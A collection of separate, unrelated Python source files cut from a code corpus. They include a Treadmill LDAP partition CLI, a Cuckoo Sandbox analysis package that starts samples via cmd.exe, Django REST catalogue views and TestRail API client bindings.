                html_start.to_bytes(2, byteorder='big'),
                len(html).to_bytes(2, byteorder='big'),
            ]
        except OverflowError as e:
            self.log.debug(e)
            self.log.debug('doc_length = {0}, link_length = {1}, title_length = {2}, html_length = {3}'.format(
                doc_length, len(link), len(title), len(html)
            ))
            # BUG FIX: the original swallowed the error and returned None,
            # silently buffering a corrupt document.  Propagate instead.
            raise
|
"""Implementation of treadmill admin ldap CLI partition plugin.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import click
from ldap3.core import exceptions as ldap_exceptions
import six
from treadmill import admin
from treadmill import cli
from treadmill import context
_LOGGER = logging.getLogger(__name__)
_MINIMUM_THRESHOLD = 5
def _resolve_partition_threshold(cell, partition, value):
    """Convert a percentage threshold into an absolute server count.

    The result is floored at _MINIMUM_THRESHOLD.
    """
    admin_srv = admin.Server(context.GLOBAL.ldap.conn)
    cell_servers = admin_srv.list({'cell': cell})
    # Number of the cell's servers that belong to this partition.
    total = sum(
        1 for server in cell_servers if server['partition'] == partition
    )
    limit = int((value / 100.0) * total)
    _LOGGER.debug('Total/limit: %s/%s', total, limit)
    return max(limit, _MINIMUM_THRESHOLD)
def init():
    """Configures Partition CLI group"""
    # Table/list formatter for partition objects.
    formatter = cli.make_formatter('partition')

    @click.group()
    @click.option('--cell', required=True,
                  envvar='TREADMILL_CELL',
                  is_eager=True, callback=cli.handle_context_opt,
                  expose_value=False)
    def partition():
        """Manage partitions"""
        pass

    @partition.command()
    @click.option('-m', '--memory', help='Memory.',
                  callback=cli.validate_memory)
    @click.option('-c', '--cpu', help='CPU.',
                  callback=cli.validate_cpu)
    @click.option('-d', '--disk', help='Disk.',
                  callback=cli.validate_disk)
    @click.option('-s', '--systems', help='System eon id list', type=cli.LIST)
    @click.option('-t', '--down-threshold', help='Down threshold.')
    @click.option('-r', '--reboot-schedule', help='Reboot schedule.',
                  callback=cli.validate_reboot_schedule)
    @click.argument('partition')
    @cli.admin.ON_EXCEPTIONS
    def configure(memory, cpu, disk, systems,
                  down_threshold, reboot_schedule, partition):
        """Create, get or modify partition configuration"""
        # Disable too many branches.
        #
        # pylint: disable=R0912
        cell = context.GLOBAL.cell
        admin_part = admin.Partition(context.GLOBAL.ldap.conn)

        # Build the attribute dict only from the options actually supplied.
        attrs = {}
        if memory:
            attrs['memory'] = memory
        if cpu:
            attrs['cpu'] = cpu
        if disk:
            attrs['disk'] = disk
        if systems:
            # A single '-' clears the system list; otherwise parse ids as ints.
            if systems == ['-']:
                attrs['systems'] = None
            else:
                attrs['systems'] = list(six.moves.map(int, systems))
        if down_threshold:
            # A trailing '%' means a percentage of the partition's servers.
            if down_threshold.endswith('%'):
                attrs['down-threshold'] = _resolve_partition_threshold(
                    cell, partition, int(down_threshold[:-1])
                )
            else:
                attrs['down-threshold'] = int(down_threshold)
        if reboot_schedule:
            attrs['reboot-schedule'] = reboot_schedule

        if attrs:
            # Create-or-update: fall back to update when the entry exists.
            try:
                admin_part.create([partition, cell], attrs)
            except ldap_exceptions.LDAPEntryAlreadyExistsResult:
                admin_part.update([partition, cell], attrs)

        # Always display the (possibly just-modified) partition.
        try:
            cli.out(formatter(admin_part.get([partition, cell])))
        except ldap_exceptions.LDAPNoSuchObjectResult:
            click.echo('Partition does not exist: %s' % partition, err=True)

    @partition.command(name='list')
    @cli.admin.ON_EXCEPTIONS
    def _list():
        """List partitions"""
        cell = context.GLOBAL.cell
        admin_cell = admin.Cell(context.GLOBAL.ldap.conn)
        partitions = admin_cell.partitions(cell)
        cli.out(formatter(partitions))

    @partition.command()
    @click.argument('label')
    @cli.admin.ON_EXCEPTIONS
    def delete(label):
        """Delete a partition"""
        cell = context.GLOBAL.cell
        admin_part = admin.Partition(context.GLOBAL.ldap.conn)
        try:
            admin_part.delete([label, cell])
        except ldap_exceptions.LDAPNoSuchObjectResult:
            click.echo('Partition does not exist: %s' % label, err=True)

    # The subcommands are already registered on the group by the decorators;
    # the local names are deleted only to satisfy lint (unused-variable).
    del configure
    del _list
    del delete

    return partition
|
import numpy as np
import pylab
from scipy import stats
#https://www.cnblogs.com/kylinlin/p/5309703.html
#未完待续:https://www.zhihu.com/question/25949022
|
# Copyright (C) 2010-2013 Claudio Guarnieri.
# Copyright (C) 2014-2016 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
from lib.common.abstracts import Package
from lib.common.rand import random_string
class Generic(Package):
    """Generic analysis package.

    The sample is launched through the START command inside a cmd.exe
    prompt.
    """

    PATHS = [
        ("System32", "cmd.exe"),
    ]

    def start(self, path):
        """Launch *path* via cmd.exe's START command and return the monitor handle."""
        cmd_path = self.get_path("cmd.exe")

        # Randomized cmd.exe window title so repeated runs are distinguishable.
        window_title = random_string(4, 16)

        # START syntax.
        # See: https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/start.mspx?mfr=true
        # start ["title"] [/dPath] [/i] [/min] [/max] [{/separate | /shared}]
        # [{/low | /normal | /high | /realtime | /abovenormal | belownormal}]
        # [/wait] [/b] [FileName] [parameters]
        start_args = ["/c", "start", "/wait", '"%s"' % window_title, path]
        return self.execute(cmd_path, args=start_args, trigger="file:%s" % path)
|
from django.shortcuts import get_object_or_404
from rest_framework import mixins
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.permissions import AllowAny
from .models import Category, Product, ProductPicture
from .serializers import CategorySerializer, ProductSerializer, ProductDetailedSerializer,FeaturedCategorySerializer
class CategoryView(mixins.ListModelMixin, mixins.RetrieveModelMixin, viewsets.GenericViewSet):
    """Read-only category endpoints: list all categories, retrieve one."""
    permission_classes = (AllowAny, )
    queryset = Category.objects.all()
    serializer_class = CategorySerializer

    def list(self, request, *args, **kwargs):
        # Serialize the (possibly filtered) full queryset in one response.
        categories = self.filter_queryset(self.get_queryset())
        return Response(self.get_serializer(categories, many=True).data)
class ProductView(mixins.ListModelMixin, viewsets.GenericViewSet):
    """List products, optionally narrowed to a single category."""
    permission_classes = (AllowAny, )
    queryset = Product.objects.all()
    serializer_class = ProductSerializer

    def get_queryset(self):
        # 'category' arrives via the URL kwargs when the route provides it.
        category_id = self.kwargs.get('category', None)
        if category_id is None:
            return self.queryset
        return self.queryset.filter(category=category_id)
class ProductDetailedView(mixins.RetrieveModelMixin, viewsets.GenericViewSet):
    """Retrieve a single product using the detailed serializer."""
    permission_classes = (AllowAny, )
    queryset = Product.objects.all()
    serializer_class = ProductDetailedSerializer
class FeaturedProductView(mixins.ListModelMixin, viewsets.GenericViewSet):
    """List categories rendered with the featured-category serializer."""
    permission_classes = (AllowAny, )
    queryset = Category.objects.all()
    serializer_class = FeaturedCategorySerializer

    def list(self, request, *args, **kwargs):
        # Serialize the (possibly filtered) full queryset in one response.
        featured = self.filter_queryset(self.get_queryset())
        return Response(self.get_serializer(featured, many=True).data)
|
from typing import List, Union
from dataclasses import dataclass
@dataclass
class Sentence:
    """One sentence record: its token list, raw text, and image/sentence ids."""
    tokens: List[str]  # the sentence split into tokens
    raw: str           # the original untokenized string
    imgid: int         # id of the associated image (semantics defined by the caller)
    sentid: int        # id of this sentence
# pylint: disable=C0302
"""
TestRail API categories
"""
from pathlib import Path
from typing import List, Optional, Union
from ._enums import METHODS
class _MetaCategory:
    """Base class for API categories; stores the shared HTTP session."""

    def __init__(self, session) -> None:
        # Session object providing .request(method, endpoint, ...).
        self._session = session
class Cases(_MetaCategory):
    """Test-case endpoints.

    http://docs.gurock.com/testrail-api2/reference-cases
    """

    def get_case(self, case_id: int) -> dict:
        """Return the existing test case with the given ID.

        http://docs.gurock.com/testrail-api2/reference-cases#get_case
        """
        endpoint = "get_case/{}".format(case_id)
        return self._session.request(METHODS.GET, endpoint)

    def get_cases(self, project_id: int, **kwargs) -> List[dict]:
        """Return the test cases of a project, suite or section.

        Supported keyword filters include suite_id, section_id, limit,
        offset and filter (title substring match).

        http://docs.gurock.com/testrail-api2/reference-cases#get_cases
        """
        endpoint = "get_cases/{}".format(project_id)
        return self._session.request(METHODS.GET, endpoint, params=kwargs)

    def add_case(self, section_id: int, title: str, **kwargs) -> dict:
        """Create a new test case under the given section.

        Extra keyword arguments (template_id, type_id, priority_id,
        estimate, milestone_id, refs, and custom fields prefixed with
        'custom_') are passed through in the request payload.

        http://docs.gurock.com/testrail-api2/reference-cases#add_case
        """
        payload = dict(title=title, **kwargs)
        endpoint = "add_case/{}".format(section_id)
        return self._session.request(METHODS.POST, endpoint, json=payload)

    def update_case(self, case_id: int, **kwargs) -> dict:
        """Partially update an existing test case.

        Accepts the same fields as add_case (except section_id).

        http://docs.gurock.com/testrail-api2/reference-cases#update_case
        """
        endpoint = "update_case/{}".format(case_id)
        return self._session.request(METHODS.POST, endpoint, json=kwargs)

    def delete_case(self, case_id: int) -> None:
        """Delete an existing test case.

        http://docs.gurock.com/testrail-api2/reference-cases#delete_case
        """
        endpoint = "delete_case/{}".format(case_id)
        return self._session.request(METHODS.POST, endpoint)
class CaseFields(_MetaCategory):
    """Test-case custom-field endpoints.

    http://docs.gurock.com/testrail-api2/reference-cases-fields
    """

    def get_case_fields(self) -> List[dict]:
        """Return the list of available test case custom fields.

        http://docs.gurock.com/testrail-api2/reference-cases-fields#get_case_fields
        """
        return self._session.request(METHODS.GET, "get_case_fields")

    def add_case_field(
        self, type: str, name: str, label: str, **kwargs  # pylint: disable=W0622
    ) -> dict:
        """Create a new test case custom field.

        ``type`` is the field type identifier, either the word (e.g.
        "String", "Dropdown") or its number sent as a string (e.g. "5" --
        sending an int yields a 400 response).  Optional keywords:
        description, include_all, template_ids, configs.

        http://docs.gurock.com/testrail-api2/reference-cases-fields#add_case_field
        """
        payload = dict(type=type, name=name, label=label, **kwargs)
        return self._session.request(METHODS.POST, "add_case_field", json=payload)
class CaseTypes(_MetaCategory):
    """Case-type endpoints.

    http://docs.gurock.com/testrail-api2/reference-cases-types
    """

    def get_case_types(self) -> List[dict]:
        """Return the list of available case types.

        http://docs.gurock.com/testrail-api2/reference-cases-types#get_case_types
        """
        return self._session.request(METHODS.GET, "get_case_types")
class Configurations(_MetaCategory):
    """Configuration and configuration-group endpoints.

    http://docs.gurock.com/testrail-api2/reference-configs
    """

    def get_configs(self, project_id: int) -> List[dict]:
        """Return configurations grouped by configuration group (TestRail 3.1+).

        http://docs.gurock.com/testrail-api2/reference-configs#get_configs
        """
        endpoint = "get_configs/{}".format(project_id)
        return self._session.request(METHODS.GET, endpoint)

    def add_config_group(self, project_id: int, name: str) -> None:
        """Create a configuration group in a project (TestRail 5.2+).

        http://docs.gurock.com/testrail-api2/reference-configs#add_config_group
        """
        endpoint = "add_config_group/{}".format(project_id)
        return self._session.request(METHODS.POST, endpoint, json={"name": name})

    def add_config(self, config_group_id: int, name: str) -> None:
        """Create a configuration inside a group (TestRail 5.2+).

        http://docs.gurock.com/testrail-api2/reference-configs#add_config
        """
        endpoint = "add_config/{}".format(config_group_id)
        return self._session.request(METHODS.POST, endpoint, json={"name": name})

    def update_config_group(self, config_group_id: int, name: str) -> None:
        """Rename an existing configuration group (TestRail 5.2+).

        http://docs.gurock.com/testrail-api2/reference-configs#update_config_group
        """
        endpoint = "update_config_group/{}".format(config_group_id)
        return self._session.request(METHODS.POST, endpoint, json={"name": name})

    def update_config(self, config_id: int, name: str) -> None:
        """Rename an existing configuration (TestRail 5.2+).

        http://docs.gurock.com/testrail-api2/reference-configs#update_config
        """
        endpoint = "update_config/{}".format(config_id)
        return self._session.request(METHODS.POST, endpoint, json={"name": name})

    def delete_config_group(self, config_group_id: int) -> None:
        """Delete a configuration group and its configurations (TestRail 5.2+).

        http://docs.gurock.com/testrail-api2/reference-configs#delete_config_group
        """
        endpoint = "delete_config_group/{}".format(config_group_id)
        return self._session.request(METHODS.POST, endpoint)

    def delete_config(self, config_id: int) -> None:
        """Delete an existing configuration (TestRail 5.2+).

        http://docs.gurock.com/testrail-api2/reference-configs#delete_config
        """
        endpoint = "delete_config/{}".format(config_id)
        return self._session.request(METHODS.POST, endpoint)
class Milestones(_MetaCategory):
    """Milestone endpoints.

    http://docs.gurock.com/testrail-api2/reference-milestones
    """

    def get_milestone(self, milestone_id: int) -> dict:
        """Return the existing milestone with the given ID.

        http://docs.gurock.com/testrail-api2/reference-milestones#get_milestone
        """
        endpoint = "get_milestone/{}".format(milestone_id)
        return self._session.request(METHODS.GET, endpoint)

    def get_milestones(self, project_id: int, **kwargs) -> List[dict]:
        """Return the list of a project's milestones.

        Optional filters: is_completed (0/1, TestRail 4.0+) and
        is_started (0/1, TestRail 5.3+).

        http://docs.gurock.com/testrail-api2/reference-milestones#get_milestones
        """
        endpoint = "get_milestones/{}".format(project_id)
        return self._session.request(METHODS.GET, endpoint, params=kwargs)

    def add_milestone(self, project_id: int, name: str, **kwargs) -> dict:
        """Create a new milestone in the given project.

        Optional keywords: description, due_on (UNIX timestamp), and --
        since TestRail 5.3 -- parent_id and start_on.

        http://docs.gurock.com/testrail-api2/reference-milestones#add_milestone
        """
        payload = dict(name=name, **kwargs)
        endpoint = "add_milestone/{}".format(project_id)
        return self._session.request(METHODS.POST, endpoint, json=payload)

    def update_milestone(self, milestone_id: int, **kwargs) -> dict:
        """Partially update an existing milestone.

        Supported keywords include is_completed, is_started, and -- since
        TestRail 5.3 -- parent_id and start_on.

        http://docs.gurock.com/testrail-api2/reference-milestones#update_milestone
        """
        endpoint = "update_milestone/{}".format(milestone_id)
        return self._session.request(METHODS.POST, endpoint, json=kwargs)

    def delete_milestone(self, milestone_id: int) -> None:
        """Delete an existing milestone.

        http://docs.gurock.com/testrail-api2/reference-milestones#delete_milestone
        """
        endpoint = "delete_milestone/{}".format(milestone_id)
        return self._session.request(METHODS.POST, endpoint)
class Plans(_MetaCategory):
    """API bindings for test plans.

    http://docs.gurock.com/testrail-api2/reference-plans
    """

    def get_plan(self, plan_id: int) -> dict:
        """Fetch a single existing test plan.

        http://docs.gurock.com/testrail-api2/reference-plans#get_plan

        :param plan_id: The ID of the test plan
        :return: response
        """
        endpoint = f"get_plan/{plan_id}"
        return self._session.request(METHODS.GET, endpoint)

    def get_plans(self, project_id: int, **kwargs) -> List[dict]:
        """List the test plans of a project.

        http://docs.gurock.com/testrail-api2/reference-plans#get_plans

        :param project_id: The ID of the project
        :param kwargs: filters
        :key created_after: int - Only return test plans created after this date
            (as UNIX timestamp).
        :key created_before: int - Only return test plans created before this date
            (as UNIX timestamp).
        :key created_by: int(list) - A comma-separated list of creators (user IDs)
            to filter by.
        :key is_completed: int - 1 to return completed test plans only.
            0 to return active test plans only.
        :key limit/offset: int - Limit the result to :limit test plans.
            Use :offset to skip records.
        :key milestone_id: int(list) - A comma-separated list of milestone IDs
            to filter by.
        :return: response
        """
        endpoint = f"get_plans/{project_id}"
        return self._session.request(METHODS.GET, endpoint, params=kwargs)

    def add_plan(self, project_id: int, name: str, **kwargs) -> dict:
        """Create a new test plan.

        http://docs.gurock.com/testrail-api2/reference-plans#add_plan

        :param project_id: The ID of the project the test plan should be added to
        :param name: The name of the test plan (required)
        :key description: str - The description of the test plan
        :key milestone_id: int - The ID of the milestone to link to the test plan
        :key entries: list - An array of objects describing the test runs of the
            plan, see the example below and add_plan_entry
        :return: response
        """
        payload = {"name": name, **kwargs}
        endpoint = f"add_plan/{project_id}"
        return self._session.request(METHODS.POST, endpoint, json=payload)

    def add_plan_entry(self, plan_id: int, suite_id: int, **kwargs) -> dict:
        """Add one or more new test runs to a test plan.

        http://docs.gurock.com/testrail-api2/reference-plans#add_plan_entry

        :param plan_id: The ID of the plan the test runs should be added to
        :param suite_id: The ID of the test suite for the test run(s) (required)
        :key name: str - The name of the test run(s)
        :key description: str - The description of the test run(s)
            (requires TestRail 5.2 or later)
        :key assignedto_id: int - The ID of the user the test run(s) should be
            assigned to
        :key include_all: bool - True for including all test cases of the test
            suite and false for a custom case selection (default: true)
        :key case_ids: list - An array of case IDs for the custom case selection
        :key config_ids: list - An array of configuration IDs used for the test
            runs of the test plan entry (requires TestRail 3.1 or later)
        :key runs: list - An array of test runs with configurations, please see
            the example below for details (requires TestRail 3.1 or later)
        :return: response
        """
        payload = {"suite_id": suite_id, **kwargs}
        endpoint = f"add_plan_entry/{plan_id}"
        return self._session.request(METHODS.POST, endpoint, json=payload)

    def update_plan(self, plan_id: int, **kwargs) -> dict:
        """Update an existing test plan (partial updates are supported, i.e.
        you can submit and update specific fields only).

        http://docs.gurock.com/testrail-api2/reference-plans#update_plan

        :param plan_id: The ID of the test plan
        :param kwargs: With the exception of the entries field, this method
            supports the same POST fields as add_plan.
        :return: response
        """
        endpoint = f"update_plan/{plan_id}"
        return self._session.request(METHODS.POST, endpoint, json=kwargs)

    def update_plan_entry(self, plan_id: int, entry_id: int, **kwargs) -> dict:
        """Update one or more existing test runs in a plan (partial updates are
        supported, i.e. you can submit and update specific fields only).

        http://docs.gurock.com/testrail-api2/reference-plans#update_plan_entry

        :param plan_id: The ID of the test plan
        :param entry_id: The ID of the test plan entry (note: not the test run ID)
        :key name: str - The name of the test run(s)
        :key description: str - The description of the test run(s)
            (requires TestRail 5.2 or later)
        :key assignedto_id: int - The ID of the user the test run(s) should be
            assigned to
        :key include_all: bool - True for including all test cases of the test
            suite and false for a custom case selection (default: true)
        :key case_ids: list - An array of case IDs for the custom case selection
        :return: response
        """
        endpoint = f"update_plan_entry/{plan_id}/{entry_id}"
        return self._session.request(METHODS.POST, endpoint, json=kwargs)

    def close_plan(self, plan_id: int) -> dict:
        """Close an existing test plan and archive its test runs & results.

        http://docs.gurock.com/testrail-api2/reference-plans#close_plan

        :param plan_id: The ID of the test plan
        :return: response
        """
        endpoint = f"close_plan/{plan_id}"
        return self._session.request(METHODS.POST, endpoint)

    def delete_plan(self, plan_id: int) -> None:
        """Delete an existing test plan.

        http://docs.gurock.com/testrail-api2/reference-plans#delete_plan

        :param plan_id: The ID of the test plan
        :return: response
        """
        endpoint = f"delete_plan/{plan_id}"
        return self._session.request(METHODS.POST, endpoint)

    def delete_plan_entry(self, plan_id: int, entry_id: int) -> None:
        """Delete one or more existing test runs from a plan.

        http://docs.gurock.com/testrail-api2/reference-plans#delete_plan_entry

        :param plan_id: The ID of the test plan
        :param entry_id: The ID of the test plan entry (note: not the test run ID)
        :return: response
        """
        endpoint = f"delete_plan_entry/{plan_id}/{entry_id}"
        return self._session.request(METHODS.POST, endpoint)
class Priorities(_MetaCategory):
    """API bindings for priorities.

    http://docs.gurock.com/testrail-api2/reference-priorities
    """

    def get_priorities(self) -> List[dict]:
        """List the available priorities.

        http://docs.gurock.com/testrail-api2/reference-priorities#get_priorities

        :return: response
        """
        return self._session.request(METHODS.GET, "get_priorities")
class Projects(_MetaCategory):
    """API bindings for projects.

    http://docs.gurock.com/testrail-api2/reference-projects
    """

    def get_project(self, project_id: int) -> dict:
        """Fetch a single existing project.

        http://docs.gurock.com/testrail-api2/reference-projects#get_project

        :param project_id: The ID of the project
        :return: response
        """
        endpoint = f"get_project/{project_id}"
        return self._session.request(METHODS.GET, endpoint)

    def get_projects(self, **kwargs) -> List[dict]:
        """List the available projects.

        http://docs.gurock.com/testrail-api2/reference-projects#get_projects

        :param kwargs: filter
        :key is_completed: int - 1 to return completed projects only.
            0 to return active projects only.
        :return: response
        """
        return self._session.request(METHODS.GET, "get_projects", params=kwargs)

    def add_project(self, name: str, **kwargs) -> dict:
        """Create a new project (admin status required).

        http://docs.gurock.com/testrail-api2/reference-projects#add_project

        :param name: The name of the project (required)
        :key announcement: str - The description of the project
        :key show_announcement: bool - True if the announcement should be
            displayed on the project's overview page and false otherwise
        :key suite_mode: int - The suite mode of the project (1 for single suite
            mode, 2 for single suite + baselines, 3 for multiple suites)
            (added with TestRail 4.0)
        :return: response
        """
        payload = {"name": name, **kwargs}
        return self._session.request(METHODS.POST, "add_project", json=payload)

    def update_project(self, project_id: int, **kwargs) -> dict:
        """Update an existing project (admin status required; partial updates
        are supported, i.e. you can submit and update specific fields only).

        http://docs.gurock.com/testrail-api2/reference-projects#update_project

        :param project_id: The ID of the project
        :param kwargs: In addition to the POST fields supported by add_project,
            this method also supports
        :key is_completed: bool - Specifies whether a project is considered
            completed or not
        :return: response
        """
        endpoint = f"update_project/{project_id}"
        return self._session.request(METHODS.POST, endpoint, json=kwargs)

    def delete_project(self, project_id: int) -> None:
        """Delete an existing project (admin status required).

        http://docs.gurock.com/testrail-api2/reference-projects#delete_project

        :param project_id: The ID of the project
        :return: response
        """
        endpoint = f"delete_project/{project_id}"
        return self._session.request(METHODS.POST, endpoint)
class Results(_MetaCategory):
    """API bindings for test results.

    http://docs.gurock.com/testrail-api2/reference-results
    """

    def get_results(self, test_id: int, **kwargs) -> List[dict]:
        """List the test results for a test.

        http://docs.gurock.com/testrail-api2/reference-results#get_results

        :param test_id: The ID of the test
        :param kwargs: filters
        :key limit/offset: int - Limit the result to :limit test results.
            Use :offset to skip records.
        :key status_id: int(list) - A comma-separated list of status IDs
            to filter by.
        :return: response
        """
        endpoint = f"get_results/{test_id}"
        return self._session.request(METHODS.GET, endpoint, params=kwargs)

    def get_results_for_case(self, run_id: int, case_id: int, **kwargs) -> List[dict]:
        """List the test results for a test run and case combination.

        http://docs.gurock.com/testrail-api2/reference-results#get_results_for_case

        The difference to get_results is that this method expects a test run +
        test case instead of a test. In TestRail, tests are part of a test run
        and the test cases are part of the related test suite. So, when you
        create a new test run, TestRail creates a test for each test case found
        in the test suite of the run. You can therefore think of a test as an
        "instance" of a test case which can have test results, comments and a
        test status. Please also see TestRail's getting started guide for more
        details about the differences between test cases and tests.

        :param run_id: The ID of the test run
        :param case_id: The ID of the test case
        :param kwargs: filters
        :key limit/offset: int - Limit the result to :limit test results.
            Use :offset to skip records.
        :key status_id: int(list) - A comma-separated list of status IDs
            to filter by.
        :return: response
        """
        endpoint = f"get_results_for_case/{run_id}/{case_id}"
        return self._session.request(METHODS.GET, endpoint, params=kwargs)

    def get_results_for_run(self, run_id: int, **kwargs) -> List[dict]:
        """List the test results for a test run.
        Requires TestRail 4.0 or later.

        http://docs.gurock.com/testrail-api2/reference-results#get_results_for_run

        :param run_id: The ID of the test run
        :param kwargs: filters
        :key created_after: int - Only return test results created after this
            date (as UNIX timestamp).
        :key created_before: int - Only return test results created before this
            date (as UNIX timestamp).
        :key created_by: int(list) - A comma-separated list of creators
            (user IDs) to filter by.
        :key limit/offset: int - Limit the result to :limit test results.
            Use :offset to skip records.
        :key status_id: int(list) - A comma-separated list of status IDs
            to filter by.
        :return: response
        """
        endpoint = f"get_results_for_run/{run_id}"
        return self._session.request(METHODS.GET, endpoint, params=kwargs)

    def add_result(self, test_id: int, **kwargs) -> List[dict]:
        """Add a new test result, comment or assign a test.
        It's recommended to use add_results instead if you plan to add results
        for multiple tests.

        http://docs.gurock.com/testrail-api2/reference-results#add_result

        :param test_id: The ID of the test the result should be added to
        :key status_id: int - The ID of the test status. The built-in system
            statuses have the following IDs:
                1 - Passed
                2 - Blocked
                3 - Untested (not allowed when adding a result)
                4 - Retest
                5 - Failed
            You can get a full list of system and custom statuses via
            get_statuses.
        :key comment: str - The comment / description for the test result
        :key version: str - The version or build you tested against
        :key elapsed: str - The time it took to execute the test,
            e.g. "30s" or "1m 45s"
        :key defects: str - A comma-separated list of defects to link to the
            test result
        :key assignedto_id: int - The ID of a user the test should be assigned to
        :return: response
        """
        endpoint = f"add_result/{test_id}"
        return self._session.request(METHODS.POST, endpoint, json=kwargs)

    def add_result_for_case(self, run_id: int, case_id: int, **kwargs) -> List[dict]:
        """Add a new test result, comment or assign a test (for a test run and
        case combination). It's recommended to use add_results_for_cases
        instead if you plan to add results for multiple test cases.

        http://docs.gurock.com/testrail-api2/reference-results#add_result_for_case

        The difference to add_result is that this method expects a test run +
        test case instead of a test. In TestRail, tests are part of a test run
        and the test cases are part of the related test suite. So, when you
        create a new test run, TestRail creates a test for each test case found
        in the test suite of the run. You can therefore think of a test as an
        "instance" of a test case which can have test results, comments and a
        test status. Please also see TestRail's getting started guide for more
        details about the differences between test cases and tests.

        :param run_id: The ID of the test run
        :param case_id: The ID of the test case
        :param kwargs: This method supports the same POST fields as add_result.
        :return: response
        """
        endpoint = f"add_result_for_case/{run_id}/{case_id}"
        return self._session.request(METHODS.POST, endpoint, json=kwargs)

    def add_results(self, run_id: int, results: List[dict]) -> List[dict]:
        """Add one or more new test results in bulk.

        http://docs.gurock.com/testrail-api2/reference-results#add_results

        This method expects an array of test results (via the 'results' field,
        please see below). Each test result must specify the test ID and can
        pass in the same fields as add_result, namely all test related system
        and custom fields. Please note that all referenced tests must belong to
        the same test run.

        :param run_id: The ID of the test run the results should be added to
        :param results: List[dict] - the array of test results described above
        :return: response
        """
        payload = {"results": results}
        endpoint = f"add_results/{run_id}"
        return self._session.request(METHODS.POST, endpoint, json=payload)

    def add_results_for_cases(self, run_id: int, results: List[dict]) -> List[dict]:
        """Add one or more new test results, comments or assign one or more
        tests (using the case IDs). Ideal for test automation to bulk-add
        multiple test results in one step. Requires TestRail 3.1 or later.

        http://docs.gurock.com/testrail-api2/reference-results#add_results_for_cases

        :param run_id: The ID of the test run the results should be added to
        :param results: List[dict]
            This method expects an array of test results (via the 'results'
            field, please see below). Each test result must specify the test
            case ID and can pass in the same fields as add_result, namely all
            test related system and custom fields.
            The difference to add_results is that this method expects test case
            IDs instead of test IDs. Please see add_result_for_case for details.
            Please note that all referenced tests must belong to the same
            test run.
        :return: response
        """
        payload = {"results": results}
        endpoint = f"add_results_for_cases/{run_id}"
        return self._session.request(METHODS.POST, endpoint, json=payload)
class ResultFields(_MetaCategory):
    """API bindings for test result custom fields.

    http://docs.gurock.com/testrail-api2/reference-results-fields
    """

    def get_result_fields(self) -> List[dict]:
        """List the available test result custom fields.

        http://docs.gurock.com/testrail-api2/reference-results-fields#get_result_fields

        :return: response
        """
        return self._session.request(METHODS.GET, "get_result_fields")
class Runs(_MetaCategory):
    """API bindings for test runs.

    http://docs.gurock.com/testrail-api2/reference-runs
    """

    def get_run(self, run_id: int) -> dict:
        """Fetch a single existing test run.
        Please see get_tests for the list of included tests in this run.

        http://docs.gurock.com/testrail-api2/reference-runs#get_run

        :param run_id: The ID of the test run
        :return: response
        """
        endpoint = f"get_run/{run_id}"
        return self._session.request(METHODS.GET, endpoint)

    def get_runs(self, project_id: int, **kwargs) -> List[dict]:
        """List the test runs of a project. Only returns those test runs that
        are not part of a test plan (please see get_plans/get_plan for this).

        http://docs.gurock.com/testrail-api2/reference-runs#get_runs

        :param project_id: The ID of the project
        :param kwargs: filters
        :key created_after: int - Only return test runs created after this date
            (as UNIX timestamp).
        :key created_before: int - Only return test runs created before this
            date (as UNIX timestamp).
        :key created_by: int(list) - A comma-separated list of creators
            (user IDs) to filter by.
        :key is_completed: int - 1 to return completed test runs only.
            0 to return active test runs only.
        :key limit/offset: int - Limit the result to :limit test runs.
            Use :offset to skip records.
        :key milestone_id: int(list) - A comma-separated list of milestone IDs
            to filter by.
        :key suite_id: int(list) - A comma-separated list of test suite IDs
            to filter by.
        :return: response
        """
        endpoint = f"get_runs/{project_id}"
        return self._session.request(METHODS.GET, endpoint, params=kwargs)

    def add_run(self, project_id: int, **kwargs) -> dict:
        """Create a new test run.

        http://docs.gurock.com/testrail-api2/reference-runs#add_run

        :param project_id: The ID of the project the test run should be added to
        :key suite_id: int - The ID of the test suite for the test run
            (optional if the project is operating in single suite mode,
            required otherwise)
        :key name: str - The name of the test run
        :key description: str - The description of the test run
        :key milestone_id: int - The ID of the milestone to link to the test run
        :key assignedto_id: int - The ID of the user the test run should be
            assigned to
        :key include_all: bool - True for including all test cases of the test
            suite and false for a custom case selection (default: true)
        :key case_ids: list - An array of case IDs for the custom case selection
        :return: response
        """
        endpoint = f"add_run/{project_id}"
        return self._session.request(METHODS.POST, endpoint, json=kwargs)

    def update_run(self, run_id: int, **kwargs) -> dict:
        """Update an existing test run (partial updates are supported, i.e.
        you can submit and update specific fields only).

        http://docs.gurock.com/testrail-api2/reference-runs#update_run

        :param run_id: The ID of the test run
        :param kwargs: With the exception of the suite_id and assignedto_id
            fields, this method supports the same POST fields as add_run.
        :return: response
        """
        endpoint = f"update_run/{run_id}"
        return self._session.request(METHODS.POST, endpoint, json=kwargs)

    def close_run(self, run_id: int) -> Optional[dict]:
        """Close an existing test run and archive its tests & results.

        http://docs.gurock.com/testrail-api2/reference-runs#close_run

        :param run_id: The ID of the test run
        :return: response
        """
        endpoint = f"close_run/{run_id}"
        return self._session.request(METHODS.POST, endpoint)

    def delete_run(self, run_id: int) -> None:
        """Delete an existing test run.

        http://docs.gurock.com/testrail-api2/reference-runs#delete_run

        :param run_id: The ID of the test run
        :return: response
        """
        endpoint = f"delete_run/{run_id}"
        return self._session.request(METHODS.POST, endpoint)
class Sections(_MetaCategory):
    """API bindings for sections.

    http://docs.gurock.com/testrail-api2/reference-sections
    """
    # FIX: the class docstring previously pointed at "reference-runs",
    # a copy-paste leftover from the Runs category.

    def get_section(self, section_id: int) -> dict:
        """Fetch a single existing section.

        http://docs.gurock.com/testrail-api2/reference-sections#get_section

        :param section_id: The ID of the section
        :return: response
        """
        return self._session.request(METHODS.GET, f"get_section/{section_id}")

    def get_sections(self, project_id: int, **kwargs) -> List[dict]:
        """List the sections for a project and test suite.

        http://docs.gurock.com/testrail-api2/reference-sections#get_sections

        :param project_id: The ID of the project
        :param kwargs:
        :key suite_id: The ID of the test suite (optional if the project is
            operating in single suite mode)
        :return: response
        """
        return self._session.request(
            METHODS.GET, f"get_sections/{project_id}", params=kwargs
        )

    def add_section(self, project_id: int, name: str, **kwargs) -> dict:
        """Create a new section.

        http://docs.gurock.com/testrail-api2/reference-sections#add_section

        :param project_id: The ID of the project
